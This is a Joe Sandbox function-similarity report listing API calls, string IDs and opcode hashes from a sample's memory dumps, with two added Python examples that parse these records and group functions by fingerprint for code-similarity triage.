                                                          • Opcode ID: 44d56f423b9f7276dbf6d2966011bdbe60e102b237ec606672c62fbaaa7ec0bc
                                                          • Instruction ID: a7cdccaeadc6f1b59d49b73132c1c3483b08387d27263e2895924d58f9760214
                                                          • Opcode Fuzzy Hash: 44d56f423b9f7276dbf6d2966011bdbe60e102b237ec606672c62fbaaa7ec0bc
                                                          • Instruction Fuzzy Hash: D8219131A00219AFCB24DF59CC809EEB3B5FF49314F1445AAE90AD7250D7319E86CBA9
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC35F
                                                          • GetLastError.KERNEL32(?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC385
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
                                                          • Opcode ID: db78667170edb988701d25b7b0bf91ef4ef629999985aee751249e981cee4e79
                                                          • Instruction ID: 11bb3447bf39695301ec950cd4086e29aa8ac214f45521d0402d9d5932211180
                                                          • Opcode Fuzzy Hash: db78667170edb988701d25b7b0bf91ef4ef629999985aee751249e981cee4e79
                                                          • Instruction Fuzzy Hash: AD21EF30A00219ABCF15DF69C8809EDB7F9FB49309F1441AAEA46D7210D731DE46CBA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: dUyl$hUyl
                                                          • API String ID: 269201875-3873126082
                                                          • Opcode ID: 38bc701473ab3a383cf6f008fd3a62daaa5e8ab7bdc414ae27425c440014592e
                                                          • Instruction ID: 566591a9f035566649d5c3e5e04e64e1af5a29bae42e6e6afe76e6758eee9bb9
                                                          • Opcode Fuzzy Hash: 38bc701473ab3a383cf6f008fd3a62daaa5e8ab7bdc414ae27425c440014592e
                                                          • Instruction Fuzzy Hash: 1111E9711057829FE3148FA9D480B82B7E4EB0A35CB20552FE49DC7B61EB71ED468B9C
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C698BCD
                                                          • ___raise_securityfailure.LIBCMT ref: 6C698CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: Dt*%
                                                          • API String ID: 3761405300-1118161045
                                                          • Opcode ID: 7ffc30983f3e1451f542b96fb84900f403e389a6528b56d7f1c1f4c510d0d1fa
                                                          • Instruction ID: c89ca98bf1f2400b4c5998b724a562e04200b205a3d95ffde3a8c4633ae1b5ec
                                                          • Opcode Fuzzy Hash: 7ffc30983f3e1451f542b96fb84900f403e389a6528b56d7f1c1f4c510d0d1fa
                                                          • Instruction Fuzzy Hash: 7921B0B97002019BDF14DF59E556B517BF4BB4B318F1180BAF5289B790E3B05982EF48
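                                                          The per-function records in this section (API list, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) are the raw material for code-similarity triage: which functions in the dump share an API and string profile, and whether those are the same code or distinct variants of it. The following is an added example for this page, not code from the Joe Sandbox report or its IDA plugin. It parses records in the layout shown above and groups them by API String ID, then counts distinct Opcode IDs per group. The sample input is copied from four of the records above (the GetLastError/__dosmaperr function and the three WriteFile/GetLastError functions) with fields the parser does not use left out; the choice of grouping keys is the example's own, not Joe Sandbox's similarity algorithm, and it does not interpret the fuzzy-hash fields, whose format this page does not document.

```python
"""Group Joe Sandbox IDA-plugin function records by their similarity fingerprints.

Added example for this report page, not Joe Sandbox code. SAMPLE is copied from
four function records above (unused fields omitted); grouping by API String ID and
then counting Opcode IDs is this example's own choice, not Joe Sandbox's algorithm.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample input: four records copied from the report above.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C6B46D6), ref: 6C6AD01B
• __dosmaperr.LIBCMT ref: 6C6AD022
• API ID: ErrorLast__dosmaperr
• API String ID: 1659562826-4022487301
• Opcode ID: 57d14b3ac652e6b9980d601ff2a393a910b0ed084951c327b93e3edff642e162
APIs
• WriteFile.KERNEL32(?,?,00000000,?,00000000,6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000), ref: 6C6AC570
• GetLastError.KERNEL32(6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC,00000000), ref: 6C6AC5A0
• API ID: ErrorFileLastWrite
• API String ID: 442123175-1118161045
• Opcode ID: 27da6e86933b16507a6cd90cd3690b9c7a6f52d6112653b33b285d75d797da73
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC448
• GetLastError.KERNEL32(?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC46E
• API ID: ErrorFileLastWrite
• API String ID: 442123175-1118161045
• Opcode ID: 44d56f423b9f7276dbf6d2966011bdbe60e102b237ec606672c62fbaaa7ec0bc
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC35F
• GetLastError.KERNEL32(?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC385
• API ID: ErrorFileLastWrite
• API String ID: 442123175-1118161045
• Opcode ID: db78667170edb988701d25b7b0bf91ef4ef629999985aee751249e981cee4e79
"""

# "• WriteFile.KERNEL32(args), ref: 6C6AC570"  or  "• __dosmaperr.LIBCMT ref: 6C6AD022"
_CALL_RE = re.compile(
    r"^•\s*(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# "• API String ID: 442123175-1118161045"  (any other "key: value" bullet)
_FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str  # call-site address exactly as printed in the report (hex string)


@dataclass
class FuncRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...


def parse_records(text: str) -> list[FuncRecord]:
    """Split report text into one FuncRecord per 'APIs' section."""
    records: list[FuncRecord] = []
    current: FuncRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function record opens with its API list
            current = FuncRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # plain section headers such as "Strings" or "Similarity"
        call = _CALL_RE.match(line)
        if call:
            current.calls.append(ApiCall(call["name"], call["module"], call["ref"].upper()))
            continue
        item = _FIELD_RE.match(line)
        if item:
            current.fields[item["key"].strip()] = item["value"].strip()
    return records


def summarize(records: list[FuncRecord]) -> dict[str, dict]:
    """Per API String ID: member count, distinct Opcode IDs, API names and call sites."""
    clusters: dict[str, list[FuncRecord]] = defaultdict(list)
    for rec in records:
        clusters[rec.fields.get("API String ID", "")].append(rec)
    return {
        key: {
            "members": len(members),
            # same Opcode ID: same opcode sequence; different: a variant behind the same profile
            "distinct_bodies": len({m.fields.get("Opcode ID", "") for m in members}),
            "apis": sorted({c.name for m in members for c in m.calls}),
            "call_sites": sorted(c.ref for m in members for c in m.calls),
        }
        for key, members in clusters.items()
    }


if __name__ == "__main__":
    for key, info in summarize(parse_records(SAMPLE)).items():
        print(f"{key}: {info['members']} function(s), {info['distinct_bodies']} distinct "
              f"Opcode ID(s), APIs {info['apis']}, call sites {info['call_sites']}")
```

                                                          Run as a script it prints one line per API String ID. On the sample, the three WriteFile/GetLastError wrappers collapse into one group with three distinct Opcode IDs, that is, three different function bodies behind one API and string profile; that is the cue to look at all three call sites before building a signature on any one of them, and to treat the API String ID as a family key rather than a function identity. Feeding the parser the whole page instead of SAMPLE works the same way, since the parser ignores lines that are not bullets and keeps any "key: value" bullet it does not recognise in the record's fields.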
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$LuJ
                                                          • API String ID: 3519838083-205571748
                                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction ID: 4eb5f2afef2d3dea792816c9eccea2dce3f487a0c5814cc2d1a64803343cab42
                                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction Fuzzy Hash: 9E01C0B2E01349DADB10DFA989809AEFBF4FF59314F40842EE469E3A40C3745A04CB99
                                                          APIs
                                                          • _free.LIBCMT ref: 6C6ADD49
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C6AA63A,?,00000004,?,4B42FCB6,?,?,6C69F78C,4B42FCB6,?), ref: 6C6ADD85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free
                                                          • String ID: 8Q
                                                          • API String ID: 1080816511-4022487301
                                                          • Opcode ID: 60b486656811757bb57eb3cd49f9b09ebb79e8a8d5d1f37df91d8c01e52a03ad
                                                          • Instruction ID: 9166ee86d3d8eb868d9a8f85d552c4d1232658196b64b73d08f7de5ef1fe77a0
                                                          • Opcode Fuzzy Hash: 60b486656811757bb57eb3cd49f9b09ebb79e8a8d5d1f37df91d8c01e52a03ad
                                                          • Instruction Fuzzy Hash: 86F0C232251215669B212AA6AC44BAE37E89F83778B210225EC149BE90DF60CC03C2ED
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: p/K$J
                                                          • API String ID: 3519838083-2069324279
                                                          • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                          • Instruction ID: edaa1457285e46603665a53a477c3f03001abaa6e19e3df6530770124cdd8960
                                                          • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                          • Instruction Fuzzy Hash: 8D019AB1A117119FD724CF59D6087AAB7F4EB55729F10C81EE096A3B40C7F8A5088BA8
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C70AFCC
                                                            • Part of subcall function 6C70A4D1: __EH_prolog.LIBCMT ref: 6C70A4D6
                                                            • Part of subcall function 6C70914B: __EH_prolog.LIBCMT ref: 6C709150
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: J$0J
                                                          • API String ID: 3519838083-2882003284
                                                          • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                          • Instruction ID: f2d1ac9d5890a64f15d45e9b7e2a8b2a508f196e98b677ac5d74812e677f42f4
                                                          • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                          • Instruction Fuzzy Hash: 8A0105B1904B50CFC325CF5AC5A82CAFBE0BB15304F90C95EC0A657B50D7B8A508CB68
                                                          APIs
                                                          • AcquireSRWLockExclusive.KERNEL32(6C79466C,?,?,652EF5AA,6C5622D8,6C79430C), ref: 6C696AB9
                                                          • ReleaseSRWLockExclusive.KERNEL32(6C79466C), ref: 6C696AF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExclusiveLock$AcquireRelease
                                                          • String ID: lFyl
                                                          • API String ID: 17069307-2656733465
                                                          • Opcode ID: 9752021a83a95fcf6845f3be1997f8c172097eaae598e6a67e45b756cb9ff2c2
                                                          • Instruction ID: 804c2401bdafce894b60c702f8f4c0bcd4208c4186ed52f6a70da3c822016f15
                                                          • Opcode Fuzzy Hash: 9752021a83a95fcf6845f3be1997f8c172097eaae598e6a67e45b756cb9ff2c2
                                                          • Instruction Fuzzy Hash: 36F0A774240602DBCB10AF55D444A75F7B4FB47335F15422EE86583B90D7749843DAA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D)K$H)K$P)K$T)K
                                                          • API String ID: 0-2262112463
                                                          • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                          • Instruction ID: af3c803d6f0f5345b3491804931973d61b568ec3047ee2cd4db57461e98700b7
                                                          • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                          • Instruction Fuzzy Hash: 9F510230A08209DBCF11CFA0DA40ADEB7B1EF4631CF14442AE85167A80DB79A948DB5E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (?K$8?K$H?K$CK
                                                          • API String ID: 0-3450752836
                                                          • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                          • Instruction ID: 94c2f218cc6da6962cb6a918715da0c920bec6fe92bc199d476a0dc6eff69c26
                                                          • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                          • Instruction Fuzzy Hash: 17F030B05017009FC320CF06D54869BF7F4EB41709F50C91EE49A9BA40D3B8A5088FA8
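Added here as a worked example, not part of the Joe Sandbox report: a Python parser that turns function-similarity records like the ones above (the APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity blocks) into dicts, keeps the "Part of subcall function" bullets nested under the API entry they belong to, and pivots each Opcode Fuzzy Hash against the dump it came from so the same fingerprint can be correlated across dumps or samples. The SAMPLE text is a constructed excerpt copied from records on this page; the layout assumptions (every record opens with an "APIs" header, and "Download File" on Associated lines is link text fused onto the file name) are mine, not documented by Joe Sandbox.

```python
# Added example: parse Joe Sandbox function-similarity records (not report code).
import re
from collections import defaultdict

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# "AcquireSRWLockExclusive.KERNEL32(6C79466C,?,?), ref: 6C696AB9" and the
# argument-less form "__EH_prolog.LIBCMT ref: 6C70AFCC".
API_RE = re.compile(
    r"^(?P<name>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.*)$")

# Constructed excerpt in the report's layout (values copied from this page, trimmed).
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 6C70AFCC
  • Part of subcall function 6C70A4D1: __EH_prolog.LIBCMT ref: 6C70A4D6
  • Part of subcall function 6C70914B: __EH_prolog.LIBCMT ref: 6C709150
Strings
Memory Dump Source
• Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: H_prolog
• Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
• Instruction Fuzzy Hash: 8A0105B1904B50CFC325CF5AC5A82CAFBE0BB15304F90C95EC0A657B50D7B8A508CB68
APIs
• AcquireSRWLockExclusive.KERNEL32(6C79466C,?,?,652EF5AA,6C5622D8,6C79430C), ref: 6C696AB9
• ReleaseSRWLockExclusive.KERNEL32(6C79466C), ref: 6C696AF3
Strings
Memory Dump Source
• Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: ExclusiveLock$AcquireRelease
• Opcode Fuzzy Hash: 9752021a83a95fcf6845f3be1997f8c172097eaae598e6a67e45b756cb9ff2c2
• Instruction Fuzzy Hash: 36F0A774240602DBCB10AF55D444A75F7B4FB47335F15422EE86583B90D7749843DAA9
"""


def _kv(body):
    """Split 'Key: value' on the first colon; an empty value (e.g. 'API ID:') is kept."""
    key, _, val = body.partition(":")
    return key.strip(), val.strip()


def _parse_api(body):
    m = API_RE.match(body)
    if not m:  # keep entries we cannot parse rather than silently dropping them
        return {"name": body, "module": "?", "args": [], "ref": None}
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": [] if args is None else [a.strip() for a in args.split(",")],
            "ref": m.group("ref")}


def parse_records(text):
    """One dict per function record; a record starts at each 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "dumps": {"associated": []},
                       "snapshot_file": None, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = SUBCALL_RE.match(body)
            if m and rec["apis"]:  # nested call belongs to the preceding API entry
                sub = _parse_api(m.group("rest"))
                sub["subcall_of"] = m.group("func")
                rec["apis"][-1].setdefault("subcalls", []).append(sub)
            else:
                rec["apis"].append(_parse_api(body))
        elif section == "Strings":
            rec["strings"].append(body)
        elif section == "Memory Dump Source":
            key, val = _kv(body)
            if key == "Associated":  # strip the "Download File" link text fused onto the name
                rec["dumps"]["associated"].append(val.removesuffix("Download File").strip())
            elif key == "Source File":  # "<dump>, Offset: <hex>, based on PE: <bool>"
                parts = [p.strip() for p in val.split(",")]
                rec["dumps"]["source_file"] = parts[0]
                for p in parts[1:]:
                    k, v = _kv(p)
                    rec["dumps"][k.lower().replace(" ", "_")] = v
        elif section == "Joe Sandbox IDA Plugin":
            rec["snapshot_file"] = _kv(body)[1]
        elif section == "Similarity":
            key, val = _kv(body)
            rec["similarity"][key] = val
    return records


def api_names(record):
    """Flatten direct API references and nested subcalls to 'MODULE!name'."""
    names = []
    for api in record["apis"]:
        names.append(f"{api['module']}!{api['name']}")
        names.extend(f"{s['module']}!{s['name']}" for s in api.get("subcalls", []))
    return names


def pivot_by_opcode_hash(records):
    """Opcode Fuzzy Hash -> sorted list of source dumps it was observed in."""
    out = defaultdict(set)
    for r in records:
        h = r["similarity"].get("Opcode Fuzzy Hash")
        if h:
            out[h].add(r["dumps"].get("source_file", "?"))
    return {h: sorted(v) for h, v in out.items()}


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["dumps"]["source_file"], api_names(r), r["similarity"].get("Opcode Fuzzy Hash"))
```

Feed the whole report text to parse_records to get every function record; the pivot is the point at which a second sample's records can be joined on Opcode Fuzzy Hash to find shared code.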